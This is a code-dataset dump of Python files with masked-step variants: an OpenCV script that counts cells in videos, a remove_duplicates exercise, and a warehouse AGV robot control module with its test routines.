6 ] }
[ 2, 3, 4, 5, 6 ]
#source: https://www.pyimagesearch.com/2015/05/25/basic-motion-detection-and-tracking-with-python-and-opencv/ from imutils.video import VideoStream import argparse import datetime import imutils import time import cv2 #capture the video file b="blood.mp4" c="Center.avi" d="Deformed.avi" i="Inlet.avi" videofile=c vs = cv2.VideoCapture(videofile) #width = vs.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH) #height = vs.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT) width = vs.get(3) height=vs.get(4) print("Width x: ",width, " Height y: ",height) print("Frame Number,x coordinate of ROI,Weidth,Height,Width/Height") # initialize the first frame in the video stream firstFrame = None # loop over the frames of the video j=0 totalframesampled=0 totalcelldetected=0 while True: j+=1 if j%1000 !=0 : continue totalframesampled+=1 # grab the current frame and initialize the occupied/unoccupied # text frame = vs.read() frame = frame[1] text = "Unoccupied" # if the frame could not be grabbed, then we have reached the end # of the video if frame is None: break # resize the frame, convert it to grayscale, and blur it frame = imutils.resize(frame, width=500) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) gray = cv2.GaussianBlur(gray, (21, 21), 0) # if the first frame is None, initialize it if firstFrame is None: firstFrame = gray continue # compute the absolute difference between the current frame and # first frame frameDelta = cv2.absdiff(firstFrame, gray) thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1] # dilate the thresholded image to fill in holes, then find contours # on thresholded image thresh = cv2.dilate(thresh, None, iterations=2) cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #print(cnts) cnts = cnts[0] if imutils.is_cv2() else cnts[1] #print("Frame: ",j) #print(cnts) # loop over the contours for c in cnts: #print("c:",c) area=cv2.contourArea(c) #print("Area:",area) minarea=250 if area<=minarea: continue (x, y, w, h) = cv2.boundingRect(c)# top left x,y, wid,hei condition_center_inlet=x>440 and x<450 condition_deformation=y>240 and y<300 if condition_center_inlet: totalcelldetected+=1 print("totalcelldetected:",totalcelldetected) print(j,x,y,w,h,w/h) cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2) text = "Occupied" k=0 frameskip=10 # for center and inlet skip=10 while k<frameskip: k+=1 temp=vs.read() break # if the contour is too small, ignore it # compute the bounding box for the contour, draw it on the frame, # and update the text # draw the text and timestamp on the frame cv2.putText(frame, "Room Status: {}".format(text), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, datetime.datetime.now().strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1) # show the frame and record if the user presses a key cv2.imshow("Security Feed", frame) cv2.imshow("Thresh", thresh) cv2.imshow("Frame Delta", frameDelta) key = cv2.waitKey(1) & 0xFF # if the `q` key is pressed, break from the lop if key == ord("q"): break # cleanup the camera and close any open windows vs.release() cv2.destroyAllWindows() print("Total frame: ",j-1) print("Frame sampled: ",totalframesampled) print("Total object detected: ",totalcelldetected)
normal
{ "blob_id": "4bd928c16cd0f06931aad5a478f8a911c5a7108b", "index": 5850, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('Width x: ', width, ' Height y: ', height)\nprint('Frame Number,x coordinate of ROI,Weidth,Height,Width/Height')\n<mask token>\nwhile True:\n j += 1\n if j % 1000 != 0:\n continue\n totalframesampled += 1\n frame = vs.read()\n frame = frame[1]\n text = 'Unoccupied'\n if frame is None:\n break\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if firstFrame is None:\n firstFrame = gray\n continue\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.dilate(thresh, None, iterations=2)\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n for c in cnts:\n area = cv2.contourArea(c)\n minarea = 250\n if area <= minarea:\n continue\n x, y, w, h = cv2.boundingRect(c)\n condition_center_inlet = x > 440 and x < 450\n condition_deformation = y > 240 and y < 300\n if condition_center_inlet:\n totalcelldetected += 1\n print('totalcelldetected:', totalcelldetected)\n print(j, x, y, w, h, w / h)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = 'Occupied'\n k = 0\n frameskip = 10\n while k < frameskip:\n k += 1\n temp = vs.read()\n break\n cv2.putText(frame, 'Room Status: {}'.format(text), (10, 20), cv2.\n FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.putText(frame, datetime.datetime.now().strftime(\n '%A %d %B %Y %I:%M:%S%p'), (10, frame.shape[0] - 10), cv2.\n FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n cv2.imshow('Security Feed', frame)\n cv2.imshow('Thresh', thresh)\n cv2.imshow('Frame Delta', frameDelta)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\nvs.release()\ncv2.destroyAllWindows()\nprint('Total frame: ', j - 1)\nprint('Frame sampled: ', totalframesampled)\nprint('Total object detected: ', totalcelldetected)\n", "step-3": "<mask token>\nb = 'blood.mp4'\nc = 'Center.avi'\nd = 'Deformed.avi'\ni = 'Inlet.avi'\nvideofile = c\nvs = cv2.VideoCapture(videofile)\nwidth = vs.get(3)\nheight = vs.get(4)\nprint('Width x: ', width, ' Height y: ', height)\nprint('Frame Number,x coordinate of ROI,Weidth,Height,Width/Height')\nfirstFrame = None\nj = 0\ntotalframesampled = 0\ntotalcelldetected = 0\nwhile True:\n j += 1\n if j % 1000 != 0:\n continue\n totalframesampled += 1\n frame = vs.read()\n frame = frame[1]\n text = 'Unoccupied'\n if frame is None:\n break\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if firstFrame is None:\n firstFrame = gray\n continue\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.dilate(thresh, None, iterations=2)\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n for c in cnts:\n area = cv2.contourArea(c)\n minarea = 250\n if area <= minarea:\n continue\n x, y, w, h = cv2.boundingRect(c)\n condition_center_inlet = x > 440 and x < 450\n condition_deformation = y > 240 and y < 300\n if condition_center_inlet:\n totalcelldetected += 1\n print('totalcelldetected:', totalcelldetected)\n print(j, x, y, w, h, w / h)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = 'Occupied'\n k = 0\n frameskip = 10\n while k < frameskip:\n k += 1\n temp = vs.read()\n break\n cv2.putText(frame, 'Room Status: {}'.format(text), (10, 20), cv2.\n FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.putText(frame, datetime.datetime.now().strftime(\n '%A %d %B %Y %I:%M:%S%p'), (10, frame.shape[0] - 10), cv2.\n FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n cv2.imshow('Security Feed', frame)\n cv2.imshow('Thresh', thresh)\n cv2.imshow('Frame Delta', frameDelta)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\nvs.release()\ncv2.destroyAllWindows()\nprint('Total frame: ', j - 1)\nprint('Frame sampled: ', totalframesampled)\nprint('Total object detected: ', totalcelldetected)\n", "step-4": "from imutils.video import VideoStream\nimport argparse\nimport datetime\nimport imutils\nimport time\nimport cv2\nb = 'blood.mp4'\nc = 'Center.avi'\nd = 'Deformed.avi'\ni = 'Inlet.avi'\nvideofile = c\nvs = cv2.VideoCapture(videofile)\nwidth = vs.get(3)\nheight = vs.get(4)\nprint('Width x: ', width, ' Height y: ', height)\nprint('Frame Number,x coordinate of ROI,Weidth,Height,Width/Height')\nfirstFrame = None\nj = 0\ntotalframesampled = 0\ntotalcelldetected = 0\nwhile True:\n j += 1\n if j % 1000 != 0:\n continue\n totalframesampled += 1\n frame = vs.read()\n frame = frame[1]\n text = 'Unoccupied'\n if frame is None:\n break\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if firstFrame is None:\n firstFrame = gray\n continue\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.dilate(thresh, None, iterations=2)\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n for c in cnts:\n area = cv2.contourArea(c)\n minarea = 250\n if area <= minarea:\n continue\n x, y, w, h = cv2.boundingRect(c)\n condition_center_inlet = x > 440 and x < 450\n condition_deformation = y > 240 and y < 300\n if condition_center_inlet:\n totalcelldetected += 1\n print('totalcelldetected:', totalcelldetected)\n print(j, x, y, w, h, w / h)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = 'Occupied'\n k = 0\n frameskip = 10\n while k < frameskip:\n k += 1\n temp = vs.read()\n break\n cv2.putText(frame, 'Room Status: {}'.format(text), (10, 20), cv2.\n FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.putText(frame, datetime.datetime.now().strftime(\n '%A %d %B %Y %I:%M:%S%p'), (10, frame.shape[0] - 10), cv2.\n FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n cv2.imshow('Security Feed', frame)\n cv2.imshow('Thresh', thresh)\n cv2.imshow('Frame Delta', frameDelta)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\nvs.release()\ncv2.destroyAllWindows()\nprint('Total frame: ', j - 1)\nprint('Frame sampled: ', totalframesampled)\nprint('Total object detected: ', totalcelldetected)\n", "step-5": "#source: https://www.pyimagesearch.com/2015/05/25/basic-motion-detection-and-tracking-with-python-and-opencv/\r\n\r\nfrom imutils.video import VideoStream\r\nimport argparse\r\nimport datetime\r\nimport imutils\r\nimport time\r\nimport cv2\r\n\r\n\r\n#capture the video file\r\nb=\"blood.mp4\"\r\nc=\"Center.avi\"\r\nd=\"Deformed.avi\"\r\ni=\"Inlet.avi\"\r\nvideofile=c\r\nvs = cv2.VideoCapture(videofile)\r\n\r\n#width = vs.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH)\r\n#height = vs.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)\r\nwidth = vs.get(3)\r\nheight=vs.get(4)\r\nprint(\"Width x: \",width, \" Height y: \",height)\r\nprint(\"Frame Number,x coordinate of ROI,Weidth,Height,Width/Height\")\r\n\r\n# initialize the first frame in the video stream\r\nfirstFrame = None\r\n\r\n# loop over the frames of the video\r\nj=0\r\ntotalframesampled=0\r\ntotalcelldetected=0\r\nwhile True:\r\n \r\n j+=1\r\n if j%1000 !=0 :\r\n continue\r\n totalframesampled+=1\r\n\t# grab the current frame and initialize the occupied/unoccupied\r\n\t# text\r\n frame = vs.read()\r\n frame = frame[1]\r\n text = \"Unoccupied\"\r\n \r\n\t# if the frame could not be grabbed, then we have reached the end\r\n\t# of the video\r\n if frame is None:\r\n break\r\n \r\n\t\r\n \r\n\t# resize the frame, convert it to grayscale, and blur it\r\n frame = imutils.resize(frame, width=500)\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\r\n \r\n\t# if the first frame is None, initialize it\r\n if firstFrame is None:\r\n firstFrame = gray\r\n continue\r\n \r\n\t\r\n\t\r\n\t\r\n\r\n\t\t# compute the absolute difference between the current frame and\r\n\t# first frame\r\n frameDelta = cv2.absdiff(firstFrame, gray)\r\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\r\n \r\n\t# dilate the thresholded image to fill in holes, then find contours\r\n\t# on thresholded image\r\n thresh = cv2.dilate(thresh, None, iterations=2)\r\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\r\n\t cv2.CHAIN_APPROX_SIMPLE)\r\n\t#print(cnts)\r\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\r\n #print(\"Frame: \",j)\r\n #print(cnts)\r\n \r\n\t# loop over the contours\r\n for c in cnts:\r\n #print(\"c:\",c)\r\n area=cv2.contourArea(c)\r\n #print(\"Area:\",area)\r\n minarea=250\r\n if area<=minarea:\r\n continue\r\n \r\n \r\n \r\n (x, y, w, h) = cv2.boundingRect(c)# top left x,y, wid,hei\r\n condition_center_inlet=x>440 and x<450\r\n condition_deformation=y>240 and y<300\r\n if condition_center_inlet:\r\n totalcelldetected+=1\r\n print(\"totalcelldetected:\",totalcelldetected)\r\n print(j,x,y,w,h,w/h)\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n text = \"Occupied\"\r\n k=0\r\n frameskip=10 # for center and inlet skip=10\r\n while k<frameskip:\r\n k+=1\r\n temp=vs.read()\r\n break\r\n\t\r\n\t\r\n\t\t# if the contour is too small, ignore it\r\n\t\r\n\t \r\n \r\n\t\t# compute the bounding box for the contour, draw it on the frame,\r\n\t\t# and update the text\r\n\t\r\n\t\r\n\t\t\t# draw the text and timestamp on the frame\r\n cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\r\n\t cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n cv2.putText(frame, datetime.datetime.now().strftime(\"%A %d %B %Y %I:%M:%S%p\"),\r\n\t (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\r\n \r\n\t# show the frame and record if the user presses a key\r\n cv2.imshow(\"Security Feed\", frame)\r\n cv2.imshow(\"Thresh\", thresh)\r\n cv2.imshow(\"Frame Delta\", frameDelta)\r\n key = cv2.waitKey(1) & 0xFF\r\n # if the `q` key is pressed, break from the lop\r\n if key == ord(\"q\"):\r\n break\r\n \r\n\t\r\n \r\n \r\n\t\r\n \r\n# cleanup the camera and close any open windows\r\nvs.release()\r\ncv2.destroyAllWindows()\r\nprint(\"Total frame: \",j-1)\r\nprint(\"Frame sampled: \",totalframesampled)\r\nprint(\"Total object detected: \",totalcelldetected)\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#Write a function remove_duplicates that takes in a list and removes elements of the list that are the same. #For example: remove_duplicates([1,1,2,2]) #should return [1,2]. #Do not modify the list you take as input! Instead, return a new list. def remove_duplicates(lst_of_items): new_list=list() #dict={} for item in lst_of_items: #dict[item] if item not in new_list: new_list.append(item) #print item return new_list print remove_duplicates([1,3,1,2,2,3,3,3])
normal
{ "blob_id": "b4d31fd05f8a9d66dcfffb55d805ab93d7ff9cdf", "index": 5441, "step-1": "#Write a function remove_duplicates that takes in a list and removes elements of the list that are the same.\n\n#For example: remove_duplicates([1,1,2,2])\n#should return [1,2].\n\n#Do not modify the list you take as input! Instead, return a new list.\n\ndef remove_duplicates(lst_of_items):\n\tnew_list=list()\n #dict={}\n\tfor item in lst_of_items:\n\t #dict[item]\n if item not in new_list:\n\t new_list.append(item)\n #print item\n\n\treturn new_list\n\nprint remove_duplicates([1,3,1,2,2,3,3,3])\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#coding=utf-8 # ycat 2017-10-20 create # AGV的控制 import sys,os import json import setup if __name__ == '__main__': setup.setCurPath(__file__) import utility import enhance import threading import time import log import re import lock import json_codec import driver.agv.hdcAgvApi as api g_threads =[] g_carts = None g_point = None g_lock = threading.RLock() locationEvent = enhance.event() api.locationEvent.connect(locationEvent.emit) @utility.init() def init(): if utility.is_test(): return api.init() time.sleep(3) def wait(): global g_threads for t in g_threads: t.join() g_threads.clear() @utility.fini() def fini(): if utility.is_test(): return api.fini() wait() g_stockLock = {} def getStockA(loc): if loc[0:6] != "stockA": return None m = re.search("stockA_row(\d+)_col(\d+).*",loc) if m is None: return None row = int(m.group(1)) col = int(m.group(2)) if row is None: return if row%2 != 1: row -= 1 return row*1000+col @lock.lock(g_lock) def checkTimeout(index,agvId,loc): global g_stockLock if index in g_stockLock: if utility.ticks() - g_stockLock[index] > 10*60*1000: unlockStockA(agvId,loc) log.warning("delete timeout locked",index) #解决在StockA两个车头对撞的问题 def lockStockA(agvId,loc): global g_stockLock index = getStockA(loc) if index is None: return if index in g_stockLock: checkTimeout(index,agvId,loc) log.warning(agvId,loc,"is locked, wait for unlock") for i in range(60*5): if index not in g_stockLock: break time.sleep(1) log.info(agvId,loc,"wait for unlock success") global g_lock log.debug(agvId,"lock",loc,index) g_lock.acquire() g_stockLock[index] = utility.ticks() g_lock.release() @lock.lock(g_lock) def unlockStockA(agvId,loc): global g_stockLock index = getStockA(loc) if index in g_stockLock: log.debug(agvId,"unlock",loc,index) del g_stockLock[index] @lock.lock(g_lock) def getPoint(originPoint): global g_point loadPoint() if g_point[originPoint] is not None: return g_point[originPoint] return originPoint @lock.lock(g_lock) def getOriginPoint(point): global g_point loadPoint() for itemIndex in g_point: if g_point[itemIndex] == point: return itemIndex return point @lock.lock(g_lock) def loadPoint(): global g_point filePath = os.path.dirname(__file__) fileName = "point.cfg" if filePath: fileName = filePath + "/" + fileName g_point = json_codec.load_file(fileName) @lock.lock(g_lock) def checkCart(cartId,scanId): scanId = scanId.strip() def loadCart(): global g_carts p = os.path.dirname(__file__) pp = "cart.cfg" if p: pp = p+"/"+pp g_carts = json_codec.load_file(pp) def saveCart(): global g_carts p = os.path.dirname(__file__) pp = "cart.cfg" if p: pp = p+"/"+pp json_codec.dump_file(pp,g_carts) def findCart(scanId): global g_carts for c in g_carts: if g_carts[c] == scanId: return c return "unknown" global g_carts if g_carts is None: loadCart() if cartId in g_carts: if scanId != g_carts[cartId]: log.error("货架ID不正确,期望货架:"+cartId+", 实际货架:"+findCart(scanId)) raise Exception("货架ID不正确,期望货架:"+cartId+", 实际货架:"+findCart(scanId)) else: g_carts[cartId] = scanId saveCart() #finishCallback参数: finishCallback(obj) #obj会自动带上下面三个参数 #obj["agv"] = agvId #obj["result"] = 0 #obj["resultDesc"] = "success" def _run(func,args,callback,obj): def threadFunc(func,args,callback,obj): hasCallback = False try: func(*args) if utility.is_exited(): return hasCallback = True callback(obj) except Exception as e: obj["result"] = -1 obj["resultDesc"] = str(e) log.exception("agvCtrl:",e) if "agv" in obj: agvId= obj["agv"] log.debug("小车:"+agvId+",出现未经处理的异常,正在返航 ") restAgv(agvId) freeAgv(agvId) if not hasCallback: callback(obj) t = threading.Thread(target=threadFunc,args=(func,args,callback,obj)) global g_threads t.start() g_threads.append(t) def _initObj(obj,agvId): obj["agv"] = agvId obj["result"] = 0 obj["resultDesc"] = "success" def _call(agvId,locId): if api.isCartLoc(locId): api.move(agvId,locId+".1") lockStockA(agvId,locId) try: api.mission(agvId,1) #旋转——》钻入货架——》扫码——》返回货架id号码 except Exception as e: unlockStockA(agvId,locId) raise e else: api.move(agvId,locId) def apply(locId): locId=getOriginPoint(locId) return api.apply(locId+'.1') def call(agvId,locId,finishCallback,obj): _initObj(obj,agvId) locId=getOriginPoint(locId) try: _run(func=_call,args=(agvId,locId),callback=finishCallback,obj=obj) except Exception as e: restAgv(agvId) freeAgv(agvId) raise e return agvId def _moveCart(agvId,srcLoc,locId,cartId): try: c = api.mission(agvId,2) #顶升任务,这个也会返回货架ID if c: checkCart(cartId,c) api.move(agvId,srcLoc+".2") except Exception as e: #TODO:ycat api.move(agvId,srcLoc+".2") #TODO:ycat raise e pass finally: unlockStockA(agvId,srcLoc) loc,type = api.getMissionType("get","",srcLoc) api.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动 loc,type = api.getMissionType("put",srcLoc,locId) api.move(agvId,loc+".3") api.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动 lockStockA(agvId,locId) try: api.move(agvId,locId+".4") api.mission(agvId,5) #放下货架 api.move(agvId,locId+".5") #返航 finally: unlockStockA(agvId,locId) freeAgv(agvId) #带货架运输 def moveCart(agvId,cartId,srcLoc,locId,finishCallback,obj): _initObj(obj,agvId) assert api.isCartLoc(cartId) #移动货架前,一定是locked状态 #assert api.isLocked(agvId) srcLoc = getOriginPoint(srcLoc) locId = getOriginPoint(locId) try: _run(func=_moveCart,args=(agvId,srcLoc,locId,cartId),callback=finishCallback,obj=obj) except Exception as e: restAgv(agvId) freeAgv(agvId) raise e #不带货架运输 def move(agvId,locId,finishCallback,obj): _initObj(obj,agvId) #移动前,一定是locked状态 #assert api.isLocked(agvId) try: locId=getOriginPoint(locId) _run(func=api.move,args=(agvId,locId),callback=finishCallback,obj=obj) except Exception as e: freeAgv(agvId) raise e #释放对agv的占用 def freeAgv(agvId): try: api.unlock(agvId) except Exception as e: log.exception("freeAgv",e) #回归转盘 def restAgv(agvId): agvId2 = api.getAgvId(agvId) api.reset(agvId2) def Init(): import interface.dashboard.dashboardApi locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc) time.sleep(3) ################# unit test ################# def testgetPoint(): resulta= getPoint("StockA_row7_col4") assert resulta== "begin_1" resultb= getPoint("StockA_row8_col4") assert resultb == "begin_2" def testgetOrginPoint(): resulta= getOriginPoint("begin_1") assert resulta== "StockA_row7_col4" resultb= getOriginPoint("begin_2") assert resultb == "StockA_row8_col4" resultc = getOriginPoint("hhahahaa") assert resultc == "hhahahaa" def testgetStockA(): assert getStockA("stockA_row10_col3") == 9003 assert getStockA("stockA_row10_col4") == 9004 assert getStockA("stockA_row1_col1") == 1001 assert getStockA("stockA_row2_col2") == 1002 assert getStockA("stockA_row3_col2") == 3002 assert getStockA("stockA_row4_col2") == 3002 assert getStockA("stockA_row4_col2.1") == 3002 assert getStockA("stockB_row4_col2.1") == None assert getStockA("begin_1") == None assert getStockA("seat_1") == None def testcheckCart(): global g_carts g_carts = None checkCart("CART9001","591") checkCart("CART9002","592") gg = json_codec.load_file("cart.cfg") assert "CART9001" in gg assert "CART9002" in gg assert gg["CART9001"] == "591" assert gg["CART9002"] == "592" checkCart("CART9002","592") checkCart("CART9001","591") try: checkCart("CART9002","591") assert 0 except Exception as e: s = str(e) assert s.find("货架ID不正确,期望货架:CART9002, 实际货架:CART9001") != -1 import counter @counter.count def move_cart(cartId,srcLoc,destLoc,agvId=None): print(cartId,srcLoc,destLoc) counter.setPrint(True) def callback1(obj): if obj["result"] == -1: print("error, system exit") obj["finish"] = True sys.exit(-1) else: log.warning(obj["agv"],"start move from",obj["loc1"],"to",obj["loc2"]) moveCart(obj["agv"],obj["cart"],obj["loc1"],obj["loc2"],callback2,obj) def callback2(obj): if obj["result"] == -1: print("error, system exit") obj["finish"] = True sys.exit(-1) else: log.warning(obj["agv"],"arrived",obj["loc2"]) obj["finish"] = True obj = {} obj["loc1"] = srcLoc obj["loc2"] = destLoc obj["cart"] = cartId print("call ",srcLoc) if agvId is None: agvId = apply(srcLoc) call(agvId,srcLoc,callback1,obj) while not utility.is_exited(): if "finish" in obj: break time.sleep(0.2) print("------ move ",srcLoc," to ",destLoc," finish ------") #def func1(start,stock1,stock2): # print("-------------------- start thread ------------------------") # time.sleep(1) # cartId = "CART9009" # move_cart(cartId,start,stock1) # next = stock1 # for s in seats: # move_cart(cartId,next,"seat"+str(s)+"_1") # if next == stock1: # next = stock2 # else: # next = stock1 # move_cart(cartId,"seat"+str(s)+"_1",next) # # move_cart(cartId, s, next) # print("=======================================") # print("finish func1") # print("=======================================") def func2(stock1,stock2): print("-------------------- start thread ------------------------",stock1,stock2) time.sleep(1) cartId = "CART9009" for i in range(20): print("current loop is - ",i.__str__()) move_cart(cartId,stock1,stock2) move_cart(cartId,stock2,stock1) print("current loop end - ",i.__str__()) print("=======================================") print("finish func2") print("=======================================") def func3(times,starts,seats): current=starts cartId = "CART9009" time.sleep(1) for loop in range(0,times-1): # current=starts tip1="currentLoop is "+loop.__str__()+" currentStart is "+current print(tip1) for i in range(0,len(seats)): next = str(seats[i]) tip2= "currentLoop is "+loop.__str__()+"currentOrigin is "+ current + "currentNext is " + next +" seatIndex is "+i.__str__() print(tip2) print("excuting") move_cart(cartId,current,next) current = next def testPageAgvControl(jsonstr): jsonData = json.loads(jsonstr) result = False if len(jsonData)==0: result=False else: for currentJson in jsonData: start = currentJson["start"] seat = currentJson["seat"] loop=int(currentJson["loop"]) seats = str.split(seat, ',') durabilityTestTask1 = threading.Thread(target=func3, args=[loop, start, seats]) durabilityTestTask1.start() result=True return result def testtestPageAgvControl(jsonstr): jsonData = json.loads(jsonstr) result = False if len(jsonData) == 0: result = False else: for currentJson in jsonData: start = currentJson["start"] print(start) time.sleep(3) seat = currentJson["seat"] seats = str.split(seat, ',') print(seat) time.sleep(3) for currentseat in seats: print(currentseat) time.sleep(3) time.sleep(10) result = True return result def testPageUnloockAll(): api.unlockAll(); def testProcess(jsonData): utility.start() testPageAgvControl(jsonData) utility.finish() def test1(): Init() durabilityTestTask1= threading.Thread(target=func3,args=[20,"stockA_row1_col3",["stockA_row1_col2","stockA_row1_col4"]]) durabilityTestTask1.start() durabilityTestTask2= threading.Thread(target=func3,args=[20,"stockA_row1_col2",["seat2_1","stockA_row4_col2"]]) # durabilityTestTask2.start() durabilityTestTask3= threading.Thread(target=func3,args=[20,"stockA_row5_col3",["seat16_1","stockA_row5_col2"]]) # durabilityTestTask3.start() durabilityTestTask4= threading.Thread(target=func3,args=[20,"stockA_row6_col3",["seat12_1","stockA_row6_col2"]]) # durabilityTestTask4.start() durabilityTestTask1.join() #t1.join() print("===============ALL FINISH ========================") if __name__ == '__main__': # utility.run_tests() if sys.argv is not None and len(sys.argv)>0: if "process" in sys.argv: log.info("run at testPage mode") args="" with open('/agvscada/driver/args.txt', 'r', encoding='utf-8') as f: args=f.read() api.init() time.sleep(3) testPageAgvControl(args) elif "unlock" in sys.argv: testPageUnloockAll() elif "test" in sys.argv: utility.start() test1() utility.finish() else: utility.start() testgetPoint() utility.finish() # test3()
normal
{ "blob_id": "e2feb12b88babbbfa4cc8447c91e8a5b6c30f78b", "index": 1466, "step-1": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = 